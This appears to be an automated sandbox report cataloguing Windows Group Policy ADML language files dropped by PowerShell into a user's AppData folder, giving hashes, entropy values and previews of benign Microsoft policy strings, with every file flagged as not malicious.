Preview:	(c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Isolation </displayName>.. <description>Configures Network Isolation Options for apps </description>.. <resources>.. <stringTable>.. .<string id="WF_Isolation">Network Isolation</string>........ Define server addresses that proxy to the Internet -->......<string id="WF_NetIsolation_Domain_Proxies">Internet proxy servers for apps</string> ...<string id="WF_NetIsolation_Domain_Proxies_Help"> This setting does not apply to desktop apps......A semicolon-separated list of Internet proxy server IP addresses. These addresses are categorized as Internet by Windows Network Isolation and are accessible to apps that have the Internet Client or Internet Client/Server capabilities....

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkProjection.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2267
Entropy (8bit):	4.838388154516794
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKQqmmBpOVxwxpBewWk7EQg+61kg+6xrjMWK/WV:LeD5pmEqmmp8xwLBzWkiz/zZjMWK/WV
MD5:	1AEA64EE82CCCF20BE4E7178E0D9C569
SHA1:	674AC6F5BD545EB75E05FED6CDD384C4440C2B29
SHA-256:	615E09EEC96E2E99550CA7014AD5E7249C031E1E19B2241032C1BE983622729D
SHA-512:	0FDE894C202D495A8A674E637B6E5B1BE25333C1D4BFECA1CA3503A19E43ECB847131FF32B81145822C87513C308C07B9CBB8A519A62999FA992CB28C3348210
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNetworkProjector">Turn off Connect to a Network Projector</string>.. <string id="DisableNetworkProjectorExplain">This policy setting disables the Connect to a Network Projector wizard so that users cannot connect to a network projector. ....If you enable this policy setting, users cannot use the Connect to a Network Projector Wizard to connect to a projector. ....If you disable or do not configure this policy setting, users can run the Connect to a Network Projector Wizard to connect to a projector.</st

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\OfflineFiles.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (634), with CRLF line terminators
Category:	dropped
Size (bytes):	50909
Entropy (8bit):	4.7108422069629725
Encrypted:	false
SSDEEP:	1536:c5kq1yeql7iURcwKILdZoJ7TCFRFzMOXIo:ZekZMOD
MD5:	845935D73456E658B4DD9CB27224CBF7
SHA1:	7336E494495EB05622F3791BC19E46499B3B60DE
SHA-256:	169924EB41BD644647F5F4710438C757F1C3BEF0196D4D09CBF9B52D05D17A47
SHA-512:	9F6BDF080314A23D1A82321CB3C8171130695E82205F32E895A7C1EEDAE59571E2C22E09171FA9377BC429A0E8118E44E151754ED2FF1A63B112494F54A9FF02
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_OfflineFiles">Offline Files</string>.. <string id="Lbl_Fail">Never go offline</string>.. <string id="Lbl_FullSync">Full</string>.. <string id="Lbl_QuickSync">Quick</string>.. <string id="Lbl_WorkOffline">Work offline</string>.. <string id="Pol_AlwaysPinSubFolders">Subfolders always available offline</string>.. <string id="Pol_AlwaysPinSubFolders_Help">Makes subfolders available offline whenever their parent folder is made available offline.....This setting automatically extends the

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\P2P-pnrp.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (447), with CRLF line terminators
Category:	dropped
Size (bytes):	15965
Entropy (8bit):	4.663039279812552
Encrypted:	false
SSDEEP:	192:EVvPk2QsF4WSKheDnylZ+QsF4W+KheDnyxko4QsF4WnKheDnyGS8OzsO4WdmI:OLvhwTjhwK4khwQ8wr
MD5:	4CE12CD17365AE6E6C922AE0C3D70110
SHA1:	328E59731F170FD42BA614E5FD6AC09AAD91C8D5
SHA-256:	D262B118B555E83840A9AC077963B0E50F589C09950F77EB5865D25776D1A78B
SHA-512:	41B5A3AF2D00993E50B4DA53132DFF75F07B549405C88589FB96AA85E074C418CA35931FA1B674EF7129B3495FABE404EF4A74F4C20A48BDE6F3E7A7408583A6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="P2P_Disabled">Turn off Microsoft Peer-to-Peer Networking Services</string>.. <string id="P2P_Disabled_Explain">This setting turns off Microsoft Peer-to-Peer Networking Services in its entirety, and will cause all dependent applications to stop working.....Peer-to-Peer protocols allow for applications in the areas of RTC, collaboration, content distribution and distributed processing.....If you enable this setting, peer-to-peer protocols will be turned off.....If you disable this setting or do not configure it,

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ParentalControls.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1084
Entropy (8bit):	5.01040774159096
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yDTRc42cN28Ml28Sv7T8MZFV:cgeD5x8gm8fKitDvNQlGVFV
MD5:	2DD43AEA1D0F6713F020401FC72878BC
SHA1:	4A8B428938DB72FC55F5EA72F95E9323BE1B4192
SHA-256:	FC70BC44ADAEC32E39A503CEEC2F52B98C697D61BE6C120A96480445A968FE5A
SHA-512:	CB4FC3B7FC46F1CBFEE1EDA2B6D51ECE2E8DBE983BB0D083109D999AC020634721FD3B42D917FEB9146A12F86D79389FAA6B95CA0832F58CC063B22D0C4B882B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ParentalControls">Family Safety</string>.. <string id="ParentalControls_EnableOnDomain_help">This policy setting allows you to configure the Family Safety feature.....If you enable this policy setting, the Family Safety control panel is visible on a domain joined computer.....If you disable or do not configure this policy setting, the Family Safety control panel is not visible on a domain joined computer.</string>.. <string id="ParentalControls_EnableOnDomain">Make Family Safety control panel visible on a

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PeerToPeerCaching.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (754), with CRLF line terminators
Category:	dropped
Size (bytes):	24638
Entropy (8bit):	4.564624284444478
Encrypted:	false
SSDEEP:	384:N1iKAegTK4PjZqKNomwtzxkBK8R02vXkh3RIaImzg6h3hquhT:N1itegT5PjsQHwtzxkBJR9yqmzh3N
MD5:	B5D667D298E0EDCC6D2FB6F0C01B7223
SHA1:	931DE60F0DBE31DC890905C6D7ACC05112F810A8
SHA-256:	673CB9F3C9B5B753C41C6B44519A04C32A10ABD90533CEC88E4AD20A0E564D55
SHA-512:	44C5535A92A8DE5364FCC39ED26171BBA4C25DDE495BFA9A9695A7F2E7F579AE08D972CAFF848ED9D5A6339307EA3CD2033838FF8AE006340D2CCB8A9F90ADB9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>BranchCache</displayName>.. <description>BranchCache enables clients to securely retrieve content from within the branch office instead of having to retrieve it from the server hosting the content. Depending on the deployment mode, the content can be retrieved from other clients in the branch office or from a hosted cache server in the branch. A client can only retrieve content from within the branch if it is authorized by the server to do so. The use of BranchCache reduces costs on the wide area network (WAN) link that connects your branch offices to the data center or headquarters and increases download speeds for content that has already been downl

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PenTraining.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1208
Entropy (8bit):	5.027249517124002
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yx9WmOQzWmYKAQKvqmiHAQKvMFV:cgeD5x8gm8fKAQmOVmYHimTHkFV
MD5:	7B4EC129E00834B2E499BEBCE8E75083
SHA1:	D4BEA36D9A628D70055431E5A6967BAF87294A02
SHA-256:	A00BB104395F6DC86AF2921893AF3BC129D7A2A2DDFA5CCA22FF6D055AF11E31
SHA-512:	5A5E2389AB7A3C432FEEB8D68F1C144A1525934FC1FA8442E8C12CC11652FEDF101E73AD8D10197FDC0F6AF0DA2D887BEFE2BAD792BEF4E943DD9C71EBAEB2F6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PenTraining">Tablet PC Pen Training</string>.. <string id="PenTrainingOff">Turn off Tablet PC Pen Training</string>.. <string id="PenTrainingOff_Help_LOCALMACHINE">Turns off Tablet PC Pen Training.....If you enable this policy setting, users cannot open Tablet PC Pen Training.....If you disable or do not configure this policy setting, users can open Tablet PC Pen Training.</string>.. <string id="PenTrainingOff_Help_USER">Turns off Tablet PC Pen Training.....If you enable this policy setting, users ca

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PerformanceDiagnostics.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (577), with CRLF line terminators
Category:	dropped
Size (bytes):	8181
Entropy (8bit):	4.68291957028103
Encrypted:	false
SSDEEP:	192:E65cdjVSpt6DejVSpOZq1jVSpWLqXjVSpsHz2TgS:bk4md
MD5:	1242B4E18BC034195D7064E4CDEB8B92
SHA1:	4BF81B86AC91ED3B51C97569728CD29858459D68
SHA-256:	29F060D6A4CA93A94F33D46150AF949B5F2EB63214AF05C5700E552555F81C54
SHA-512:	0A17703E8858409CB9AEBE827143EA77516576F473AC18873B3848F4A4D000F739E757655945CAB3DBE8E05B06496E07C2C8C7811CE5D7407153D9B167B8015E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootScenarioCategory">Windows Boot Performance Diagnostics</string>.. <string id="BootScenarioExecutionPolicyExplain">Determines the execution level for Windows Boot Performance Diagnostics.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect Windows Boot Performance problems and attempt to determine their root causes. These root causes will be logged to the eve

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PerformancePerftrack.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.988086677223878
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yuh9J6k7LXp4qVacJPYidFV:cgeD5x8gm8fKVJ6kSuacFYidFV
MD5:	EF84A579BC8272236E53AB9F5BEE92CB
SHA1:	670EA5FF6A1559F695E15D3A2D17B2A100BA79B7
SHA-256:	82C7F47D059ED97EF6AC7068E43E6933E84ACE56543FD8C945065A51C0644A63
SHA-512:	92D8CC050A24AC9F2D059486A9EA5A8184FCC6798261F789E36F1A4694F379EC9EFA8CA69AF8D53502187B7D908850EB2233038BD22901D116195F32E0E8A937
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PerfTrackCategory">Windows Performance PerfTrack</string>.. <string id="PerfTrackScenarioExecutionPolicyExplain">This policy setting specifies whether to enable or disable tracking of responsiveness events.....If you enable this policy setting, responsiveness events are processed and aggregated. The aggregated data will be transmitted to Microsoft through SQM.....if you disable this policy setting, responsiveness events are not processed.....If you do not configure this policy setting, the DPS will enable Wind

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Power.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (389), with CRLF line terminators
Category:	dropped
Size (bytes):	29740
Entropy (8bit):	4.822333468541642
Encrypted:	false
SSDEEP:	384:EkJF7YAK1c67c5h9xRoKYy5V8iisCaeZou2Ap6:EkJF7YA0a9xR5V8iPCgu2Ap6
MD5:	C0E2A98755B3DA961DBBCFA1A621154B
SHA1:	878508DB646C47D8A36C90305D919C52CD8DC11C
SHA-256:	0F8B66F7B315426ABEC4B71912D2FF5F1F4A573AC391CD8E0A10738AF808F8A6
SHA-512:	AD72CA9823E3581557BE15F198F6BB697CEF9CC372881FED501DB236D6B35834A220603F4AB36FBEE65D36DF3473862F0AD93F9443EF82204F28130F635910E8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ACCriticalSleepTransitionsDisable">Turn on the ability for applications to prevent sleep transitions (plugged in)</string>.. <string id="ACHibernateTimeOut">Specify the system hibernate timeout (plugged in)</string>.. <string id="ACPowerButtonAction">Select the Power button action (plugged in)</string>.. <string id="ACPromptForPasswordOnResume">Require a password when a computer wakes (plugged in)</string>.. <string id="ACSleepButtonAction">Select the Sleep button action (plugged in)</string>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PowerShellExecutionPolicy.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	8601
Entropy (8bit):	4.7004620993687665
Encrypted:	false
SSDEEP:	96:wB3f/vzRzuppcRzhl5tWSLh2xwqmHfc9Ka7yOUpJD4mUQfStlm8hOE9m7pqHXSp3:ozRzu0P+uIxrmpn8mgtlm8B9mgc3
MD5:	6E1645BEEB36B67E2486DF156AD73713
SHA1:	96BF04C94854CBA227B3E3518A5BF6EEEEFFCA64
SHA-256:	1963DE8A3D77000A3DCF16B751132920F2F8ED0274905285C914469D1597F11D
SHA-512:	5A6D2DAEE84146D94A7D93640C92B14792C759D1E778C25BA3CA3B892628B87848EC414EC6DB709F6912B3E38397C608A343D719AF8B26169022FADBCF35DB79
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Windows PowerShell</displayName>.. <description>This file contains the configuration options for Windows PowerShell</description>.. <resources>.. <stringTable>.. <string id="AllScripts">Allow all scripts</string>.. <string id="AllScriptsSigned">Allow only signed scripts</string>.. <string id="EnableScripts">Turn on Script Execution</string>.. <string id="EnableScripts_Explain">This policy setting lets you configure the script execution policy, controlling which scripts are allowed to run.....If you enable this policy setting, the scripts selected in the drop-down list are allowed to run.....The "Allow only signed scripts" policy setting allows scripts to execute only if they are signed

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PreviousVersions.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5301
Entropy (8bit):	4.592135641503131
Encrypted:	false
SSDEEP:	96:LeD5pmieohnx5hxncDmeoqCcxjBgAeocs7x7BNcGDQaFV:EBtx5h9zqCccQcs75BhDQan
MD5:	4DAE700A902336A7ACD9315F2DCB6F00
SHA1:	B472C8447E223252B2B43403D60468B62C3FFE2C
SHA-256:	DC5A3DE3D24654B83D269B2A74148B777261995A56ABAD7943616BBA648A28AE
SHA-512:	3C572957861E0FD9D62F51C8ED0DB407C7C20C1DBCD99B2F06F60DE19D31158367D03C8729E8EC0B41F983D7744F9FEADE91C4AE68434EFEBDF57F9BBC201D9E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableBackupRestore">Prevent restoring previous versions from backups</string>.. <string id="DisableBackupRestore_Help">This policy setting lets you suppress the Restore button in the previous versions property page when the user has selected a previous version of a local file, in which the previous version is stored on a backup.....If you enable this policy setting, the Restore button is disabled when the user selects a previous version corresponding to a backup.....If you disable this policy setting, the Re

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Printing.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (568), with CRLF line terminators
Category:	dropped
Size (bytes):	33066
Entropy (8bit):	4.630945231898182
Encrypted:	false
SSDEEP:	384:YRG9T17KYkXyUrqDiynH2yi4oO+gwlquRfpxHkyT/yT/eaXl+H1CUnJi:tvmrrnlpxHkyedu1CUnw
MD5:	587143E4C31AF88A0591C34F205DB7FB
SHA1:	F6B86A1E88E2822BA2A595E6BD047BD04CCD5C0B
SHA-256:	90D12A7BC2ECAE124C62A43069FCD48E3AAA6F214325372EA82E5727F290D184
SHA-512:	ED01D954728347AA2A0DED6D0F351BDDD5C9CA0254802BCEED01104D5C5909342A15A6D628B4249782151E748514679822A169A3CC846722E1BA81A24D9EAAA3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowWebPrinting">Activate Internet printing</string>.. <string id="AllowWebPrinting_Help">Internet printing lets you display printers on Web pages so that printers can be viewed, managed, and used across the Internet or an intranet..... If you enable this policy setting, Internet printing is activated on this server..... If you disable this policy setting or do not configure it, Internet printing is not activated..... Internet printing is an extension of Internet In

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Printing2.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (640), with CRLF line terminators
Category:	dropped
Size (bytes):	14598
Entropy (8bit):	4.638367767119586
Encrypted:	false
SSDEEP:	192:vPo4LQX7miuddCSgP71CTd5xZSq5ynxWmBIY+DOxH++JGQfFD:ox7Idu7Ih5xwqcJJrxPAM
MD5:	5BA865D69814055E09D5698701921315
SHA1:	E0F4F6C1D949A6E2B1A30D4397CED3C175A3F003
SHA-256:	28D160709A578AE08008CE9F84EFA853F0CD30C05AC418ED0085133B7F5BE4F8
SHA-512:	7A09CB06DAE4236124B0CDE8B8C4887C95CEAE97C1EEB8D632AFE142B4ED7BBA4DB52AE3BFF03253C9CE7C5242FD6E8894B74A7AB294BECA5B39429FCF09591F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>Printing Group Policies</displayName>.. <description>Printing Group Policies valid on all Windows flavors except ARM</description>.. <resources>.. <stringTable>.. <string id="RegisterSpoolerRemoteRpcEndPoint">Allow Print Spooler to accept client connections</string>.. <string id="RegisterSpoolerRemoteRpcEndPoint_Help">This policy controls whether the print spooler will accept client connections.....When the policy is unconfigured or enabled, the spooler will always accept client connections.....When the policy is disabled, the spooler will not accept client connections nor allow users to share printers. All printers current

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Programs.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
Category:	dropped
Size (bytes):	7022
Entropy (8bit):	4.658208655049282
Encrypted:	false
SSDEEP:	96:LeD5pmxKh8Wc3Ww1nZy8hmiZWV9k4W0DWivt2fpre9hWJT+K3AqcOrzqhScDMFsO:EU3RnY82DVYfUrWd+kxXc0sVcfu9q
MD5:	14D4B2677604A342B26891EFC3597078
SHA1:	A51EBAF7D5FCFF778B9AEDCE6F37C5C9D6B2B0EC
SHA-256:	5EE2DF374170A87F773008D43AEBEBEF3E1C451F0E9A530B6F2CD5C1601E0012
SHA-512:	DB06D2D412763EC3ACA0D03D4694E6D86C4149B57BD31EA91E8C0E0C3ED8C56B15FDBB2B3FB441D5DC3C5BD262FDE2543A27477FF32C2509473B87B5B10DEDEF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Programs">Programs</string>.. <string id="NoProgramsCPL">Hide the Programs Control Panel</string>.. <string id="NoProgramsCPL_Help">This setting prevents users from using the Programs Control Panel in Category View and Programs and Features in Classic View... ..The Programs Control Panel allows users to uninstall, change, and repair programs, enable and disable Windows Features, set program defaults, view installed updates, and purchase software from Windows Marketplace. Programs published or assigned to

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\PswdSync.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
Category:	dropped
Size (bytes):	4835
Entropy (8bit):	4.774670262203608
Encrypted:	false
SSDEEP:	96:LeD5pmMM44GDFsil1oXY7XlMXC3K8GDFeMbiZC0XEV:EB4eFUXUXuy33eFPAX0
MD5:	81A4179A1F50B390A55CEC61B95F6752
SHA1:	1D21A6C288E6EB744C52CCAA2A81298CAB467B12
SHA-256:	5A277C91D697FECAEBECFD1AA4A38F6027C5800BFB4B5EBEBBA90251C788BEAB
SHA-512:	F79C992F4FA17D80A8B65F7AB9753DBBBC12295B80DBDAA3C71CE417B63F9B39774D4ABF5381FD45320E684728FBD05D3761FF37F53A26A3076DF20C3EA2DB71
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PswdSync">Password Synchronization</string>.. <string id="Psync_LoggingLevel">Turn on extensive logging for Password Synchronization</string>.. <string id="Psync_LoggingLevel_Help">This policy setting allows an administrator to turn on extensive logging for Password Synchronization.....If you enable this policy setting, all affected computers that are running Password Synchronization log intermediate steps for password synchronization attempts.....If you disable or do not configure this policy setting, in

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\QOS.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	22100
Entropy (8bit):	4.777240545794819
Encrypted:	false
SSDEEP:	384:S0I0F0I0w0i0O0Q0c0K0F1P0mDeWvyz0gx0YV0BI0l+0Xe0X:f+
MD5:	5A29BFD51F48A0377276834F0B8BAF80
SHA1:	E1F484C1462470950E95ADC7D7E4FC1A6FA273B6
SHA-256:	39B7A57E44813AFFEF1380FC4A2CE929EDAAAB031B457C50381A76996FD6B654
SHA-512:	DE4B16EDBAB62DEDF2AC48ABF223AE084B29A7DC6231507ECE14DF273CECA57F1E86C4C9AFAF0CE627394C6523E7D140A1A60E8E9B8D5D7FA93C57304BEE2AF3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="QosDBMC_BestEffort_Help">Specifies an alternate Layer-3 Differentiated Services Code Point (DSCP) value for packets with the Best Effort service type (ServiceTypeBestEffort). The Packet Scheduler inserts the corresponding DSCP value in the IP header of the packets.....This setting applies only to packets that conform to the flow specification.....If you enable this setting, you can change the default DSCP value associated with the Best Effort service type.....If you disable this setting, the system uses the default

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RPC.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (491), with CRLF line terminators
Category:	dropped
Size (bytes):	13725
Entropy (8bit):	4.739504626052788
Encrypted:	false
SSDEEP:	192:EuPHdbK3t1tsbRP7MaC+9D29YVm8yvRyd4+gzsBUNh8yhXOLzUFoNP1npbNjtKjr:9vdew4argz4/gzsGbF5OLzQm1pFtcr
MD5:	C7D0520662B4D6F3A33CD02E7D078832
SHA1:	2092E311A0CDB5F1EDBFC9D3A39490EA6F061314
SHA-256:	A1595A8F7F77496CB3DAE9BA4A8787985FF7C5C7B50BCE6EA19ECC823B874C57
SHA-512:	0F23E0D8B3A0C3007C81794DEA01E218A6810AF134BB40DE84C7509BC2F82C0E6F919E4C2994C2964C977C9F7EC0DFB4456328C928C3A3A67B5EC1126152ACE0
Malicious:	false
